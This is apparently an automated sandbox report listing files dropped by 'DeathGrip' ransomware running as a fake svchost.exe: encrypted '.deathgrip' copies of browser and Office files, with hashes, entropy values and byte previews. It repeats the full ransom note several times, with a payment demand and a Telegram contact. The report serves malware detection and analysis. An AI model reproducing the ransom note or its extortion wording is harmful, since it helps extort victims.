                                                          SSDEEP:96:RXTmKepJOc36R7tYtlJ1EBEqHWCojMkc20qg3f5RPSopFhU770T58hdAvafIjwWm:RiKepJhKTYteFbo4k87hFtFxCfCwWfQx
                                                          MD5:E01F82547AA6307EFB487AA7A0B5073B
                                                          SHA1:C50DE3C64FF0F15A08BE9D55CA32B9F3162A1D68
                                                          SHA-256:0E4CB10E41A743C6B53217992712B94068927F168FC6C3E15952AC83CE6BC987
                                                          SHA-512:FD54F3FE13B66674D09F65DDFE85A22B3FB5FE0AFD5053219E3891D8E0D65750B2D4FEEC4363ACE65B55B686EC1A0A15711AC0247B91A21666EA6B8C857D804F
                                                          Malicious:false
                                                          Preview:.........m.}2-..J3.x...x..s.8.......i....{U+....JoJ..$W..;pA......:.5.C.au.]"R...IP.=..u9.~..FK.j._.....>.6.(..6.P.....p.~......s.....e.....R(~.%V...J.kd.o.Z_...........4.....op:....*.p...7mD../.$N......s%...|$u..h.6m.*n...rT..ka.....!"...U..,....*....a.Xz.......~.F.../P...D.iY_..O}..1;1Ip..{V.b.8.. I...w...,."....%.qny.`#B2.i.RT..]4.}.&..db....|.}....L....,.o.e...Rr.#..ZF.....O..X..5<......._.....H....u......N.l.j.....Y.x..aK1......dy...ic..<3.3..r.r..5....s.gu=.}bD..2.._.M,f_.3....+k.t....V`...t.)..2%.P.z....&.?.vFC..s...L..o....N..B...%.&.Cr..z#*..... ..?...D.}.u...;..>.h.C?...3zwF......b....h..X.X[.7L*...b.y...M.*.v^.U..X.....f...bP.g.J.R1@......%...V,?.....4.=....4.}.....f.0../..#lN...-.:%...=...U........aO..R.[?._........q.......{*......-.....H.A~f.M....'..S../T..A.U2;.......'.g.%........tL@.......]....uG.o%......N.....0..i.....EU....X>..6.....A8.{.....}..G.KS.JD2.h.<......T..2p..|.f[4.........?.n..0.L...aSH...^V........4.IH..|=A.

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\192.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3280
                                                          Entropy (8bit):7.9281601023168005
                                                          Encrypted:false
                                                          SSDEEP:48:xQoa4u1uiEEpeDTibQAEV/eEy03lHDcc5XGo2g2O44RFzBNaMy9c6vtFennb:x043UwTl/LD7d2O4U5f16LIb
                                                          MD5:733AFC7522C89A64E2ACDE957AB04DCC
                                                          SHA1:8FEDFC143484AE30DA410DAB6952944FCBEEE1A9
                                                          SHA-256:12FE8E5E5A263925B50D13E2069230D6F13E20349DA44DE5E148D9E146956543
                                                          SHA-512:BA67B93F6E540A66830195443664619B2F20D9323AF2921A68BDEE917862DBC301EB73E94FC95132FD9BC0475639E67FCCCF519E5410FE448388FEDA907A39A4
                                                          Malicious:false
                                                          Preview:..........r....A.e...S......m7.Q/..b.5.)..z.L.X.j.<E..W..\..:....!.....H...ga...y......K.....'.b..\o...]......"TT@.^J....y".8....'.?.z.G..,....T..)K\a.....m.usoy]..wX....kjvn..W...2.Y..$...).....^L.82.A...s..i...w"."...w.3&....'.......E]..........j.....b...jd...f.X..4...|f.f.H.<.:..+3.-.`.....o....+...(..!..z.......M.+....b`..>..C..=....W..U.s..1j.C..1.....\qc......%Y.GWb......R....D...`...[...g....1.s.v.)Q.e`g...........(aR..H..4..8}.>.r.^.E0..% ....!5=q8.Q).A.;N\z....)...M..._eB.{Yy..N.m..x.}~4._.2f4.$...:...3.......!.=.[.......s2....9........I..l>...v.-}....-.T7.=....oZ1.K#...#...S..+.s..~'>..P...dC...:Q.E.p.<R.0...D.6..@0l.1.......E./.i.....r..tQs.x....b..9..V.1..X%.<.I....q....(.{...VtY.c...H.n.].m..P.*g.7.!....i#...w......).8........2..*d..Z.U........8..M...../bd....e....*.vr....0Y.J..m..sn........g.....|...RU'.{6/.:........2}..........V@.b.e....DN.~...q_?..h...b..cZ......jM.#.?.......#V...r...b.8]q.Fq...I...!.t..H<.y..h

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\VERSION.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):464
                                                          Entropy (8bit):6.713952594899851
                                                          Encrypted:false
                                                          SSDEEP:12:toQJkSeN9vUCPU/dZDltjIui0Lf8UzKmju35bkqIq7n:WSeN981/XltjLiwkmKuupbXPn
                                                          MD5:20A89D51D4AC8B6C4CF25757542A36AC
                                                          SHA1:C456C6D2023F7DC89643B49445C36B613AD99682
                                                          SHA-256:3BECD1FA24B6B38A167991FEFB7D13EC32BA292C9C67B23B9B0C3E8B680BB543
                                                          SHA-512:14F09659FC326725A635A94489CAA0216306AB5ED1E69F5F3E444B7DF8FCA5A6F819C91C9862A30329F20AE6E581266073FF916509B2F76DAA308F4A008711A2
                                                          Malicious:false
                                                          Preview:........J.z....T...%.....h.....5...gu..).?x.....b..I2*.C....$..d.=#....O.?..rlPV...^#.......`?g.q.'.@.,.."....EMHbKptvxY9jQeMo8lPE5NAHtyI/ZZHb0rHQfOvvb2YdEiCoZ1cn67xHnDxfXpp6mzfnh+yduYAw2OCTa1F52Gd6wcsQ0NLQ1j7bwgJ8hDc8TeIUwcoJQFn2k9HBFsFc2vYXdVQeyMr55ok+SwwWKdMN8tF1HY03p2sjcNwWJ+mRdAichR+qerr0eSkZ+8bnWe32o2CcL/TrC6rFYuzPPEhqklzaBan3BgwpHKJLYZR80IYyhmXe3oNbsv3fTRnjk6o2yJZH6OHamMuoShsn091SDN4F4mGZtVkNTNeJv/d03Kdo+aELBWuko/1u4SFHY1DzisKWZI6pyeMW5/mrfyg==

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\override_list.pb.gz

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\override_list.pb.gz.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):490448
                                                          Entropy (8bit):7.999628111050592
                                                          Encrypted:true
                                                          SSDEEP:12288:DLKEljhYz8B+uqCU2wltueNCXjofnZKyU:DWEljyF1C1wltvUjwU
                                                          MD5:92384E14B34411A9EF931126ADEED5C6
                                                          SHA1:D420C19A9EE3033880020C53B3CA87AAEFC00829
                                                          SHA-256:CA7BFA67DFEC142F17BD8A3F2D97B4D4B66FA04D4E286FDC5E67B9D19D6CF375
                                                          SHA-512:7B8BD2D411D520F5E5094D7542C238D81023643F9E91455D02F376FEE5B67C6F3F3748A8D87A00644B8C09CD3EE2D8EDD5519F4EE4A3A4E9BF54F634CBDA2A27
                                                          Malicious:true
                                                          Preview:........'..5..@`.j+&..9.e..![[.**&.... .'e..g..y ...B}.....Y..;.;..l!....r........C^?_..*3x.....%..m.....B.;.C..h..O.....)*.q..f...K..,U ^.bAb....U..]B.b.H.....u.a+b"...V.o.e..8.R.C9x.l.B$.'.F...>.....c..&X...+.....B^....@..iv.V'...^.OJ<..e:.g.|.H...>>s(.i.T..7...IoKV:...u.,u../.@.V.TVc._..n(...h\.K.*U8C.Z..k..0,...;h.e.0<H5zd..#.?.uf.3..+ @.b.....^.WFlY../b.w.5s...-.C.T+..f...i..S..J...?..w..QO...[...-.\.g.F,....J.1-....%.....mD..,.- ...w..P..?Y.lNt.<Y..Q......D:._.(..&..S...+X.....n.!.K..@..[....wB.....!.9C..i.....$I...]!.f.T.X.c..#..:W.......'.;._3J.]....=.k.......+.~.h.."..(.P..e..../...>..H.0..#~.!?...'P"..x.......v].......2.^.|O......MO]`l.ao.Ts.....(e.%I&.\...ta.........kf0..Q...uD.r0....X.Q..1.3...,.Wx.M...4..=<Dd.g..*.~[.ir.v.`e..p...}[..C.r...H=.b.6..*#;..Z...2.K.9.Xz.....g....|._..M..5`....u.|...9Al,...D.B...Pm!4{.....a.. ...s.7..jA...;..z!...h|a.........w....`.8.n.M..N.80...`."..3..E.r...............y...F..|...$]....W....E.I...#

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\vocab_en.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1376
                                                          Entropy (8bit):7.701870511372252
                                                          Encrypted:false
                                                          SSDEEP:24:yCqUHX/B8+mjy2ZuWnGVXhR2oJdpWvZmENFmvolCpdO3gbkK3f9XzS3MO:XPJ8LZZuLxh8AEvZmENFmvICO3gb79XQ
                                                          MD5:1D068989B93A2D30D1316A6778D2A548
                                                          SHA1:561FBEA749F42D82BEB331C1863F97B8BBB667FA
                                                          SHA-256:24D9EC316FE3C62E19EF0AC211AFB1EAD2D0D5E45FF5B018895D084E38264B90
                                                          SHA-512:6A891E2801A5226025D9BE11C055E05840C4CF43ABFE70B5FEC3D4B780849452CF2E6B7E19FF3B9BE2EF9EAF908EB9173B75296E6C09566C17D38D47F5ADA9E2
                                                          Malicious:false
                                                          Preview:.............m.. .P.B/...8.}.....<...i..A......Zs7b....r9..-.......`.'z..As$f..)q.;j.g.63..).....G&.zS]Run.....m...3.Y.fL,..<..J.\SWc...&U.JL$.....R.....6i....e0.C.31.UG.J3_..B.....1X...+.......`e_.f...*5.._.p].&......aH.!.;.y#9>U.J..#.....X...a.m...D..*BBn.+....!.F..Oi.\*nq..I.E.{u.c..NE.v.T...mx`...G+.<MN.._e..[..)<..kL..e..Z...Y.r...a..SVn....-F-s3w.X...A....|e..@..a.K....r.....2.h.]..U(4O..<..#..5..H.#......p1...&.._.B...y......1...Y'..2.K7.h..D....g..T.../......^.L.<G2D+..."...-{..m.:tM.S.].W..p.u............DA..)..Qb.D5+__..TJ/@..Ds.,..F.+.Pjt..SmO....9..2e..M.......1.?|...l.h.........$..Z.;.H.:..m.6.xD..@.=..Q.....w$.\...2a.aE..G.....CU..u..r..H.[\.L8..>J. ...M......m.x..x..Ei.0.(e......g..c1e.dKw......U.. ......q`W+.v-.........4.m.HF...I....Z..EN.sn.3$ .......06.....NO=S...1..dFbB....k...*{.^.<w^".o...u..a..n.`O.....^w...L....X..S/...Nm.).0#..T.j.e!3>$.z....Kw{.O..}...@7KP.n,.-J=...Em...g..(...q.....c.pa...7.SP.b...NuB....Gc.t.....

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):76880
                                                          Entropy (8bit):7.9976592956758195
                                                          Encrypted:true
                                                          SSDEEP:1536:pe3r43UHyCoU6BBWwdYiOK8qWkbgd7u5gYBK1lElPK6HjounHL:TUfmBBWliWbk7VB2RmjoEr
                                                          MD5:A886A26CCD8695D7B02432088D59D67B
                                                          SHA1:FBE9BB898F39E95BD07728FB130838295A792C6C
                                                          SHA-256:D9CAE1A9729B47166323E235696175A56F673DBC8F172CD4D370176590EBDD19
                                                          SHA-512:C5442CD02D922B8F0EAD364CD36F038D8EF1ACB36A11D773C13097DB5F585FBD69CC98E083DA73D25781640B3F11FCB9D7621DD43F2E7C5E9F653D8DE339DC4C
                                                          Malicious:true
                                                          Preview:........fF.c3....:I.lXA9q.|...^...8......dh.........u...Q%.tJ.....G.~.ta.....9...r.1..@UN..a..&.T....ovB...Y...091...l&.hA..k.P.0.[B.....R...~+.-J....`..Np.9{.P.rb..{'..t..Nq........T.:.._hD....~?......2..|.>|V................d.pf_n...Z..w.B.....`..x..4Rc.....hr..;<.Hq.-./.1.....m.M}...u...O.J.NOT!.%U."D......~.B..C.r.|..9&.9^Z...;..1.."x.......ugb.9:..YKX5.!....t.9.?-..v.k......>.t.....+!)e....mb.I.m.2...u..H|....3'....:g ...v...*..t(n?..xwi..)..D.....;...<....J....*.`A.....8.^V .|........D.. gO...o...v6.G...kIE}O.F..{R.;.C.<+'.t4.]....9...so{..lO(.,n/.......}1.....g^.De......=.......!.&....4..u.*...=H[..H...\.....[Y^Q..8f...WN..............l.d.4.ks.O....&..y.......a.@.$.".M..?...Vk..k5{......vf....../4..N.i9\.!..~.}X...Ak_...A1.?.ubRV...<..T.....}..T.@.&QA....j..G.H..b.......)(J......<z.>..P......8....Y....}.R..zS.1..........g.WIl.l.KCy....6.A.../.P.....r..........=...........D4...+.$.....(..Y.y..v.'&.......;}...S:....%.KH...........p.H..

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1344
                                                          Entropy (8bit):7.772988632801522
                                                          Encrypted:false
                                                          SSDEEP:24:DTFv+s2Mpi/0oxPrr1QJbsdtSNpIHXtYqDR+gVX/6m4l3BDH8H9U/Z:DTFt2MtoxPcIQIHXtYy5H4lB78HQZ
                                                          MD5:3D88885B94106864FE67D8D276E7F756
                                                          SHA1:A1722FBDABC2F798BDC667F33BB058ABD841CF3E
                                                          SHA-256:B0D2F4314E9480B8FADC5017BC890150D456F3B6C701B228522725C4303925E7
                                                          SHA-512:2E7058A8C1FC98C5FD1D6E211C7B685F6FD1E2DF4F27E31419BB14C484C2751799E4A58C71F58D4419D9D8CBBDA4B6CCC5D33707885FD33A1467B6C4A043BFC8
                                                          Malicious:false
                                                          Preview:........9^..gE..#...4m*N..m...(.*.s.I.C...*..~..'!.R.E.......s...0...t.B........]j 8UA...".Fs.%..*....F. .$.@;|Z1iPX..V..$aD...}.|.....i.#...>.......0k'..f=5..j..S./..]...)+.z.D..Z...........[u...iW-.f4.]h+.z../.$m.e.U]......s.,..Zt.....Q...n....";*.j42."k.@....-F..{...+..p..TI#.....&.L...4... ..k..j......t.6p..|...v../............S.@...]..V<.%..HF.E5......3q.2...@.....W.Dq..l..g\..@..S...!X!.w..\.r..@%....O.z........ZR..$....K...!....@8......3.|..}.....f.;.......+.e........]..&..`..._..c.yJ1H9}......r."...~...0.=.0d.8......f.Q.N..W"....ecA.$St...Mv.u.m....5........U..ZN...f.p..7......:.a.....a....0X.q.Z[.^.~.RP7...2..WK.#..e}.`..1....a.dv..|..b.4..M..............?.o\\...M.....,..y.L.Z..a?...j7|.F.....?z.k.M..>....\4=O.:jl.........T/........o...&J...Q..6...@.,..0q..ZK...pW...S...@..*!.(}/....'...C{.z...[y!./&;..(..%l.gz...>..J.m....W|..B$.....!.......\.....J.b.1..DG.1.D...R.-G..h.K..^..$e..9..\.u....I...R_...B.A....9..A'j.....@.2N

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\first_party_sets.db

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\first_party_sets.db.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):49520
                                                          Entropy (8bit):7.995500607832387
                                                          Encrypted:true
                                                          SSDEEP:768:oslhj4qQ0+3WnPBed8HcyHXGuTaraiyRBQoLejmq21/13TIE3cnNjDr7ledue:7ldlpeGHRHX/a2RRBQ2eji3TIEshPe
                                                          MD5:2F4662E1DF4EFCB3C75B6B5B823229F7
                                                          SHA1:1DFCE637959554CA2598A2D9F1B52BEC6473A11D
                                                          SHA-256:0362EEED51E2896D3E0F03701F5504FE3028704E5D739EC751557D20A998119B
                                                          SHA-512:69D7D73BE5BE078A61C04A758D3ED1D2EA3D01C0BAFB0499500AFC380F226CF593F61216E87567B8F373B0526A6EC4CBBBCEF589183B23B27C8869C5B0AEA9D6
                                                          Malicious:true
                                                          Preview:........!.]......Xy..CFm.!.K...R.c..SE...=.{..R....hL.+...+T..F....`?.....]..b.......1..x.(..X..)...M(a...x.r....wT..6.i..*IL.a....pt.>....[r..K......$.v...#w......;.396....O.....N.b..F.S.ETV.._8ne.C..F}...M..........~.=.B.1..Q+p...q.r+~D.N..#.$..........H+b..r...Q.......l=..`...5ff..0.....F.........kk..E.;.?I.je...A....Goh...%...!.........BY%.......z..;.u.0.:pr9.v6.H.;.k*.7n..L....egp....4.z.Hpp...;....>.?.a18...j......g....1.._..?7......NDH.{(.&....[.w.U..?.z.P. .".H..<...'7..+.....%R......}.b...8..+.I0..6'.K4.^D!E%...m.6...q.....Wp;.\....xi..V.........T.$ti...-..Ak.-..X.A .,0D\d.a....#.B.....q.H.r .[s.^z.."...&O...D-..<.2jH.`...RkZ.@...6.7.F.`.;*#.9&....9;D.H.a.#.}x.xv.J.L}.2.x.06.f....K....Sdj.w.MU.9...).....O..e-...,f{et]...QG:HE.[HY...S.5....o&;<.7'.G'...~...g.jJ6F......*.K..I.#.....^I..h....y.VN.}...T.P#I...:............ ".].bdP....P......b^...lu..'L^..z}gs)\...Ih^.n.0....g..F..T.3..q..#..."<{M.'2..9..+.Z..z..`.C$2.X....z..C...

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Microsoft\FontCache\3\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Microsoft\FontCache\4\Catalog\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Microsoft\GameDVR\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\Personalization\Content\Anonymous\Insights.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\Personalization\Content\Anonymous\Insights.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):752
                                                          Entropy (8bit):7.313225641001115
                                                          Encrypted:false
                                                          SSDEEP:12:r5QQ97aKRDb9fNmrUsIpQMRq1Ok5YUMRpkOID0coaTNoIvr0iRhHYhESlxueA3YE:uQNJbTFqM81p+VpyTP0iRhHzAetiG
                                                          MD5:B0F54174BD433A3F97864BF6313201DB
                                                          SHA1:4EA653E82A92A8F8242C2A0C510412B6A7994210
                                                          SHA-256:FE7B494BA498A76833A1F2BFD941AF738C4B67F75673C8B4CBB8BECDBC97549A
                                                          SHA-512:59E343C9EAFF94B1399BEBEACEEAC4FF252AD805C0A930FDFA639CA6A14505B0AF6722CCC8A392226DEF95E1DCE062A870DED4E1B7622BD1E8000666B952503D
                                                          Malicious:false
